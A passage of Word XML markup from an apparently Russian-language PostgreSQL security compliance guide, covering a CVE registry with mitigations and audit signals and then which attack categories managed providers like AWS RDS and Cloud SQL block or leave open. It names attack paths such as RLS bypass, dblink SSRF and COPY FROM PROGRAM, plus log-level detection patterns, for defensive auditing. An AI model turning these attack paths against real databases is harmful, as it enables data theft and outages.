        <w:t xml:space="preserve"> (array integer overflow → ACE). Карточка: см. 4.3.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Зачем в реестре</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: открытый advisory без public PoC, но advisory указывает на возможность ACE; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">assumed critical для compliance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Mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: только upgrade. Низкая видимость PoC ≠ низкая severity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DoS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R23 — CVE-2025-12817</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CREATE STATISTICS DoS). Карточка: см. 4.5.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Зачем в реестре</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: атакующий с CREATE на любой схеме (= низкий privilege) ломает workflow администратора.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Audit-сигнал</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: CREATE STATISTICS в чужих схемах от non-admin ролей.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R27 — CVE-2025-4207</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (GB18030 over-read DoS). Карточка: см. 4.5.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Зачем в реестре</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: затрагивает и сервер, и libpq-клиент; в Asia-Pacific deployments с GB18030 — реальный DoS-vector.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Audit-сигнал</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: процессы postgres crash-нувшие с SIGSEGV в server log + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET client_encoding='GB18030'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в session log.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Trust bypass / supply chain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R10 — CVE-2024-10977</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (libpq MITM error injection). Карточка: см. 4.4.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Зачем в реестре</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: ANSI-escape injection в terminal через MITM — actively exploitable в untrusted networks (corporate guest wifi, hotel networks).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Mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: всегда SSL/TLS + verify-full mode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Adjacent ecosystem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R24 — CVE-2025-13780</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (pgAdmin restore regex bypass). Карточка: см. 4.5.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Зачем в реестре</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: pgAdmin — стандартный admin tool; backup-файлы часто sent across teams (DBA → developer). Single crafted backup → RCE на DBA workstation.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Mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: upgrade pgAdmin + не импортировать backup-ы из недоверенных источников.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводная таблица «когда срабатывает в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234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Audit-trigger (где в логах видно попытку)</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CVE-2023-5868</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memory disclosure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pg_stat_statements: частые </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">string_agg('A', '')</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array_agg(?)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> от не-aggregate ролей</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memory corruption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server crashes (SIGSEGV) после array-modification — strongest indicator</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CVE-2024-4317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SELECT ... FROM pg_stats_ext</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> от ролей без SELECT на target tables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trust bypass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connection attempts без TLS handshake completion (network-level capture)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CVE-2025-4207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server crashes + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SET client_encoding='GB18030'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> в session log непосредственно перед crash</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CVE-2025-12817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STATISTICS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> в чужих схемах от non-admin ролей; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">relation already exists</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> errors у admin при routine optimization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CVE-2025-13780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adjacent RCE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pgAdmin restore events с dump-файлами из non-standard sources; child-процессы shell с pgAdmin как parent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Связь с разделом 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для этой группы CVE compliance-mitigations большей частью покрываются разделом 5.5 (конфиги: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ssl = 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sslmode=verify-full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log_connections = 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log_disconnections = on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) и 5.6 (логирование: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extension,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server logs с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_min_messages = warning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Отдельная защита от каждого CVE-в-группе не требуется — общие defence-in-depth меры (минимальные привилегии application-роли, отсутствие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доступа, корректная SSL/TLS-конфигурация) покрывают audit-сигналы и закрывают exploitation paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.9 Managed-провайдеры</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Managed PostgreSQL providers (AWS RDS / Aurora, Google Cloud SQL, Supabase, Azure Database for PostgreSQL) — четыре главных variant-а deployment. Все они структурно ограничивают часть категорий 3.X (нет superuser → нет COPY FROM PROGRAM, нет произвольных CREATE EXTENSION) и при этом наследуют все классы атак, независимые от server config (RLS, identifier injection, time-based blind).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS RDS / Aurora PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Patch policy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> RDS обычно отстаёт от upstream на 1–2 minor; standart minor upgrade применяется в provider's maintenance window, явно сконфигурированном tenant-ом. Critical CVE (CVSS ≥ 7) могут получить out-of-band patches быстрее — AWS отправляет email-notifications для tenant action. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`rds_superuser`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — НЕ полный PostgreSQL superuser: ряд операций недоступен (logical replication setup, custom C extensions,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что структурно блокирует значительную часть категорий 3.X из этой документации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Невозможные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3.7.1 COPY FROM PROGRAM</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не выдаётся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Атака не работает по умолчанию.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3.6.1 dblink с произвольным host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EXTENSION dblink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> требует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даже после установки outbound network ограничен VPC security groups.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3.6.2 postgres_fdw SSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — то же ограничение через VPC.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3.6.3/3.6.4 pg_read_server_files / lo_import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — недоступно (нет superuser, нет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Доступные категории.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Все категории 3.1–3.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SQL injection class) — независимы от server config.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3.8 metadata extraction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pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> доступны (read on system catalogs — by design).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3.13.X SECURITY DEFINER paths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владеет некоторыми объектами; SD-функции от него могут давать RLS bypass (см. 3.17.5).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 RLS bypasses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — все вектора применимы.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 identifier injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — application-level, не зависит от provider.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Provider-specific quirks.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CVE-2024-4317 (R17, pg_stats_ext fix)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — требует manual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в каждой БД. RDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не запускает этот скрипт автоматически</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; кластер «patched по версии» (16.3+) может оставаться </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">уязвим к view-leak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Защита: ручной запуск fix-script через tenant DBA или audit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schema integrity.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`rds_superuser` как trust anchor для SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — SD-функции, owned by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обходят RLS без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FORCE RLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Audit critical.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CloudWatch / Performance Insights</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — могут flag unusual queries (CREATE OPERATOR, pg_sleep, large IN-lists), но не настроены на injection-сигналы из коробки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Google Cloud SQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Patch policy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Patch lag в Cloud SQL — аналогично RDS (обычно 1–2 minor от upstream). Minor upgrade применяется в maintenance window, конфигурируется per-instance в GCP console. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`cloudsqlsuperuser`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — equivalent к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(НЕ полный superuser; те же структурные ограничения). Cloud SQL Insights / Query Insights — аналог AWS Performance Insights; flags нестандартные query patterns, но не настроен на конкретные injection-сигнатуры.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Невозможные категории.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Аналогично RDS — нет true superuser, нет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нет произвольного CREATE EXTENSION.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Provider-specific quirks.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Cloud SQL flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для GUC — некоторые параметры доступны через flag UI, некоторые — нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
